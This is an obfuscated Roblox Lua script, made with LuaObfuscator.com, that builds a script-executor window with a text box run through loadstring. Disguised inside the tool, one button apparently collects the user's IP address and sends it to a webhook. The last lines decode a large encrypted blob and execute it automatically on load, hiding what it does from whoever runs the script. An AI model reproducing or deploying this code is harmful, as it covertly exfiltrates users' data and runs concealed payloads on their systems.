--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v116,v117) local v118={};for v125=1, #v116 do v6(v118,v0(v4(v1(v2(v116,v125,v125 + 1 )),v1(v2(v117,1 + (v125% #v117) ,1 + (v125% #v117) + 1 )))%256 ));end return v5(v118);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\0\178\81\2\158\51\82\32\184\71","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\220\69\2\54\29\240","\158\48\118\66\114"));local v12=Instance.new(v7("\159\33\8\34\81\176\239\191\43\30","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\96\207\55\241\69","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\200\82\191\82\208\86\165\67\240","\38\156\55\199"));local v15=Instance.new(v7("\142\111\125\37\22","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\44\150\246\205\140\40\61\28\177\197","\84\121\223\177\191\237\76"));local v17=Instance.new(v7("\136\85\219\175\54\92\57\207\188\112\219\161\55\85","\161\219\54\169\192\90\48\80"));local v18=Instance.new(v7("\125\71\24\49\107\77\24","\69\41\34\96"));local v19=0 -0 ;v8.Name=v7("\146\202\195\24\13\62\175\198\151\47\26\46\191\214\195\5\16","\75\220\163\183\106\98");v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\50\182\138\46\220\16\157\158\62","\185\98\218\235\87"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\233\27","\202\171\92\71\134\190");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(4 + 5 ,9,3 + 6 );v9.BorderColor3=Color3.fromRGB(4,8 -4 ,4);v9.Position=UDim2.new(0.5, -278,14.5 -(9 + 5) , -161);v9.Size=UDim2.new(376 -(85 + 291) ,1821 -(243 + 1022) ,0,322);v9.Active=true;local v31=game.Players.LocalPlayer:GetMouse();local v32;v9.InputBegan:Connect(function(v119) if (v119.UserInputType==Enum.UserInputType.MouseButton1) then local v127=0;local v128;local v129;while true do if (v127==(3 -2)) then v129=v9.Position-UDim2.new(0 + 0 ,v128.X,1180 -(1123 + 57) ,v128.Y) ;v119.Changed:Connect(function() if (v119.UserInputState==Enum.UserInputState.End) then v32=false;end end);v127=2 + 0 ;end if (v127==(254 -(163 + 91))) then v32=true;v128=v119.Position;v127=1931 -(1869 + 61) ;end if (v127==(1 + 1)) then v31.Move:Connect(function() if v32 then local v132=v31.Position;v9.Position=UDim2.new(0 -0 ,v132.X,0,v132.Y) + v129 ;end end);break;end end end end);v10.Name=v7("\12\217\41\139\60\213\41","\232\73\161\76");v10.Parent=v9;v10.BackgroundColor3=Color3.fromRGB(19 -6 ,13,2 + 11 );v10.BorderColor3=Color3.fromRGB(0 -0 ,0,0 + 0 );v10.BorderSizePixel=0;v10.Position=UDim2.new(0.0251798555,1474 -(1329 + 145) ,0.912591577,0);v10.Size=UDim2.new(971 -(140 + 831) ,65,1850 -(1409 + 441) ,739 -(15 + 703) );v10.Font=Enum.Font.SourceSans;v10.Text=v7("\158\193\71\94\11\175\220","\126\219\185\34\61");v10.TextColor3=Color3.fromRGB(94 + 108 ,82,585 -(262 + 176) );v10.TextSize=1735 -(345 + 1376) ;v10.MouseButton1Click:Connect(function() loadstring(v18.Text)();end);v11.Name=v7("\47\194\91\115\108","\135\108\174\62\18\30\23\147");v11.Parent=v9;v11.BackgroundColor3=Color3.fromRGB(13,701 -(198 + 490) ,57 -44 );v11.BorderColor3=Color3.fromRGB(0 -0 ,1206 -(696 + 510) ,0 -0 );v11.BorderSizePixel=1262 -(1091 + 171) ;v11.Position=UDim2.new(0.161870509,0,0.912591577 + 0 ,0);v11.Size=UDim2.new(0 -0 ,65,0 -0 ,21);v11.Font=Enum.Font.SourceSans;v11.Text=v7("\149\229\47\202\10","\167\214\137\74\171\120\206\83");v11.TextColor3=Color3.fromRGB(202,456 -(123 + 251) ,147);v11.TextSize=69 -55 ;v11.MouseButton1Click:Connect(function() v18.Text="";end);v12.Name=v7("\162\254\56\88\251\179","\199\235\144\82\61\152");v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(711 -(208 + 490) ,2 + 11 ,6 + 7 );v12.BorderColor3=Color3.fromRGB(0,836 -(660 + 176) ,0 + 0 );v12.BorderSizePixel=202 -(14 + 188) ;v12.Position=UDim2.new(675.868705034 -(534 + 141) ,0 + 0 ,0.912591577,0 + 0 );v12.Size=UDim2.new(0 + 0 ,136 -71 ,0,32 -11 );v12.Font=Enum.Font.SourceSans;v12.Text=v7("\46\24\179\46\4\2","\75\103\118\217");v12.TextColor3=Color3.fromRGB(566 -364 ,45 + 37 ,94 + 53 );v12.TextSize=410 -(115 + 281) ;v12.MouseButton1Click:Connect(function() local v121=0;local v122;while true do if (v121==(2 -1)) then v122=getIPAddress();sendToWebhook(v122);break;end if (v121==(0 + 0)) then v19=v19 + 1 ;if (v19>=(4 -2)) then print(v7("\233\93\100\6\182\11\212\20\113\24\171\27\198\80\105\84\176\16\205\81\115\0\188\26\137","\126\167\52\16\116\217"));else print(v7("\230\39\52\146\187\12\239\136\39\46\138\177\26\232\205\42\110","\156\168\78\64\224\212\121"));end v121=1;end end end);v13.Name=v7("\51\225\181","\174\103\142\197");v13.Parent=v9;v13.BackgroundColor3=Color3.fromRGB(21 -15 ,873 -(550 + 317) ,8 -2 );v13.BorderColor3=Color3.fromRGB(0,0 -0 ,0);v13.BorderSizePixel=0;v13.Size=UDim2.new(0,1553 -997 ,285 -(134 + 151) ,1694 -(970 + 695) );v14.Name=v7("\117\36\80\43\32","\152\54\72\63\88\69\62");v14.Parent=v9;v14.BackgroundColor3=Color3.fromRGB(486 -231 ,2245 -(582 + 1408) ,884 -629 );v14.BackgroundTransparency=1;v14.BorderColor3=Color3.fromRGB(0,0 -0 ,0 -0 );v14.BorderSizePixel=1824 -(1195 + 629) ;v14.Position=UDim2.new(0.0139885219 -0 ,241 -(187 + 54) ,780.00358560216 -(162 + 618) ,0 + 0 );v14.Size=UDim2.new(0 + 0 ,202 -107 ,0,42 -17 );v14.Font=Enum.Font.SourceSans;v14.Text=v7("\250\205\250\78\219\209\253\28\241\220\235\95\193\208\225\78","\60\180\164\142");v14.TextColor3=Color3.fromRGB(16 + 186 ,1718 -(1373 + 263) ,1147 -(451 + 549) );v14.TextSize=6 + 11 ;v15.Name=v7("\108\81\21\105\0\255\19\92\87\0\39\51","\114\56\62\101\73\71\141");v15.Parent=v9;v15.BackgroundColor3=Color3.fromRGB(255,396 -141 ,428 -173 );v15.BorderColor3=Color3.fromRGB(1384 -(746 + 638) ,0 + 0 ,0);v15.BorderSizePixel=0;v15.Position=UDim2.new(0 -0 ,341 -(218 + 123) ,1581.0880479962 -(1535 + 46) ,0 + 0 );v15.Size=UDim2.new(0 + 0 ,1116 -(306 + 254) ,0 + 0 ,1 -0 );v16.Color=ColorSequence.new({ColorSequenceKeypoint.new(1467 -(899 + 568) ,Color3.fromRGB(6 + 3 ,21 -12 ,612 -(268 + 335) )),ColorSequenceKeypoint.new(572.5 -(426 + 146) ,Color3.fromRGB(25 + 177 ,82,147)),ColorSequenceKeypoint.new(1,Color3.fromRGB(9,820 -(569 + 242) ,25 -16 ))});v16.Parent=v15;v17.Parent=v9;v17.BackgroundColor3=Color3.fromRGB(1 + 12 ,1037 -(706 + 318) ,13);v17.BorderColor3=Color3.fromRGB(0,1251 -(721 + 530) ,0);v17.BorderSizePixel=1271 -(945 + 326) ;v17.Position=UDim2.new(0.0139884679,0,0.117786594,0 -0 );v17.Size=UDim2.new(0 + 0 ,540,0,948 -(271 + 429) );v17.ScrollBarThickness=16;v18.Parent=v17;v18.BackgroundTransparency=1 + 0 ;v18.Size=UDim2.new(1501 -(1408 + 92) ,0,1,1086 -(461 + 625) );v18.Font=Enum.Font.SourceSans;v18.Text=v7("\139\234\201\205\168\253\155\227\183\236\200\132\144\236\201\193","\164\216\137\187");v18.TextColor3=Color3.fromRGB(1543 -(993 + 295) ,14 + 241 ,1426 -(418 + 753) );v18.TextSize=6 + 8 ;v18.TextXAlignment=Enum.TextXAlignment.Left;v18.TextYAlignment=Enum.TextYAlignment.Top;game:GetService(v7("\231\245\52\160\143\240\27\199\242\2\183\180\232\2\209\227","\107\178\134\81\210\198\158")).InputBegan:Connect(function(v123) if (v123.KeyCode==Enum.KeyCode.F5) then v9.Visible= not v9.Visible;end end);game:GetService(v7("\8\2\131\223\175\42\29","\202\88\110\226\166")).LocalPlayer:GetMouse().MouseIconEnabled=true;local v113=base64.decode(v7("\234\44\163\240\227\228\11\138\245\253\246\26\183\249\252\214\58\208\193\211\199\2\142\253\240\240\90\179\245\153\237\95\183\165\198\215\11\181\239\194\199\40\142\225\200\201\31\166\245\152\150\26\184\192\228\147\36\165\205\155\193\2\172\167\203\244\86\151\220\233\200\36\171\212\235\196\38\161\214\205\234\44\160\229\240\251\3\149\244\199\245\21\129\238\205\212\10\167\210\154\232\62\141\240\227\224\46\133\222\233\226\8\171\208\155\207\12\209\217\194\249\93\180\254\200\144\8\141\222\193\215\22\187\192\155\212\11\186\218\205\242\92\168\255\201\145\8\139\219\233\226\6\179\192\158\196\11\181\162\198\198\39\160\251\243\144\61\142\205\233\225\3\129\249\224\213\12\139\213\220\250\93\172\166\201\205\37\142\205\233\225\7\128\250\251\196\60\209\221\194\193\55\160\166\201\218\45\151\205\253\245\4\129\238\232\147\13\155\213\210\199\56\142\167\230\202\45\168\205\195\225\95\131\208\198\217\38\165\227\198\249\55\160\237\227\228\7\138\244\226\225\3\128\250\198\214\53\155\213\221\193\40\180\255\201\145\58\133\244\199\245\24\128\164\224\147\38\165\251\154\234\39\176\225\227\228\57\143\246\253\229\28\174\254\227\208\38\166\210\218\224\6\163\240\227\224\46\133\222\233\226\8\129\223\224\211\13\140\198\197\234\4\138\213\251\147\27\168\195\193\192\8\177\194\159\246\59\155\213\254\241\57\168\192\248\245\38\139\220\251\204\8\171\212\235\196\38\161\214\205\234\39\134\255\201\206\91\141\222\193\203\45\179\167\222\233\59\137\244\205\240\58\215\194\254\218\45\182\197\252\233\56\176\193\227\202\36\179\248\205\234\44\163\240\227\224\46\133\222\237\245\22\129\250\147\218\36\161\221\227\242\58\172\219\249\246\90\170\222\239\207\32\180\210\146\196\58\210\193\249\245\4\180\196\227\202\4\169\222\233\226\8\171\212\235\196\38\161\213\216\249\55\142\224\201\206\57\152\244\211\196\24\135\211\206\225\36\179\248\205\234\44\163\240\227\224\46\133\222\237\215\3\135\207\224\207\13\165\193\194\192\93\183\248\231\235\8\209\198\249\200\36\171\212\235\196\38\165\193\223\249\44\137\220","\170\163\111\226\151"));local v114=loadstring;local v115={};do v115.Initiate=function(v126) v114(v113)();end;end v115:Initiate();
